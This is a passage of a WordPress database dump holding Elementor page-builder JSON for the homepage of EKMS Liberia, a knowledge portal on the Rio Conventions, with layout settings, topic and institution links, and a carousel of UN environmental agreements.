layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19097,2795,'_elementor_version','2.7.5'),(19098,2795,'_elementor_template_type','wp-page'),(19099,2795,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19103,2796,'_wp_page_template','default'),(19104,2796,'_elementor_edit_mode','builder'),(19105,2796,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19106,2796,'_elementor_version','2.7.5'),(19107,2796,'_elementor_template_type','wp-page'),(19108,2796,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19111,2797,'_wp_page_template','default'),(19112,2797,'_elementor_edit_mode','builder'),(19113,2797,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center 